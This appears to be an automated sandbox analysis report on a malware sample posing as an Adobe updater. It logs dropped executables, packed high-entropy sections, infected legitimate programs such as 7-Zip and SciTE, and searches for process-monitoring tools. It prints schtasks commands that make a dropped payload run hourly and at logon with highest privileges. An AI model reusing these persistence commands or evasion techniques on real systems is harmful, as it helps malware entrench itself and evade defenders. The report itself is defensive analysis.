Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "	Jump to behavior

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: AdobeUpdaterV131.exe

Static file information: File size 2342912 > 1048576

Source: AdobeUpdaterV131.exe

Static PE information: Raw size of czumqxku is bigger than: 0x100000 < 0x1a4a00

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Unpacked PE file: 0.2.AdobeUpdaterV131.exe.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Unpacked PE file: 1.2.xRp.exe.4e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 9.2.MPGPH131.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 10.2.MPGPH131.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Unpacked PE file: 12.2.RageMP131.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Unpacked PE file: 14.2.RageMP131.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Unpacked PE file: 15.2.xRp.exe.e30000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: u

Source: AdobeUpdaterV131.exe	Static PE information: section name:
Source: AdobeUpdaterV131.exe	Static PE information: section name: .idata
Source: AdobeUpdaterV131.exe	Static PE information: section name:
Source: AdobeUpdaterV131.exe	Static PE information: section name: czumqxku
Source: AdobeUpdaterV131.exe	Static PE information: section name: oiivdxoz
Source: AdobeUpdaterV131.exe	Static PE information: section name: .taggant
Source: AdobeUpdaterV131.exe	Static PE information: section name: u
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: .idata
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: czumqxku
Source: MPGPH131.exe.0.dr	Static PE information: section name: oiivdxoz
Source: MPGPH131.exe.0.dr	Static PE information: section name: .taggant
Source: MPGPH131.exe.0.dr	Static PE information: section name: u
Source: xRp.exe.0.dr	Static PE information: section name: .aspack
Source: xRp.exe.0.dr	Static PE information: section name: .adata
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: .idata
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: czumqxku
Source: RageMP131.exe.0.dr	Static PE information: section name: oiivdxoz
Source: RageMP131.exe.0.dr	Static PE information: section name: .taggant
Source: RageMP131.exe.0.dr	Static PE information: section name: u
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_006FC7B8 push ecx; ret	0_2_006FC7CB
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E1638 push dword ptr [004E3084h]; ret	1_2_004E170E
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E600A push ebp; ret	1_2_004E600D
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E2D9B push ecx; ret	1_2_004E2DAB
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E6014 push 004E14E1h; ret	1_2_004E6425
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00B8C7B8 push ecx; ret	9_2_00B8C7CB
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00B8C7B8 push ecx; ret	10_2_00B8C7CB
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_006CB4B0 push 00000000h; retf	12_2_006CB4B8
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_0069C7B8 push ecx; ret	12_2_0069C7CB
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_006CB4B0 push 00000000h; retf	14_2_006CB4B8
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_0069C7B8 push ecx; ret	14_2_0069C7CB
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E31638 push dword ptr [00E33084h]; ret	15_2_00E3170E
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E3600A push ebp; ret	15_2_00E3600D
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E36014 push 00E314E1h; ret	15_2_00E36425
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E32D9B push ecx; ret	15_2_00E32DAB

Source: AdobeUpdaterV131.exe	Static PE information: section name: entropy: 7.980927554299119
Source: AdobeUpdaterV131.exe	Static PE information: section name: czumqxku entropy: 7.951415630425814
Source: AdobeUpdaterV131.exe	Static PE information: section name: u entropy: 6.933507194790652
Source: MPGPH131.exe.0.dr	Static PE information: section name: entropy: 7.980927554299119
Source: MPGPH131.exe.0.dr	Static PE information: section name: czumqxku entropy: 7.951415630425814
Source: MPGPH131.exe.0.dr	Static PE information: section name: u entropy: 6.933507194790652
Source: xRp.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: RageMP131.exe.0.dr	Static PE information: section name: entropy: 7.980927554299119
Source: RageMP131.exe.0.dr	Static PE information: section name: czumqxku entropy: 7.951415630425814
Source: RageMP131.exe.0.dr	Static PE information: section name: u entropy: 6.933507194790652
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934511024885519
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.935286807883395
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.9346424707437535

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	File created: C:\Users\user\AppData\Local\Temp\xRp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

File created: C:\ProgramData\MPGPH131\MPGPH131.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
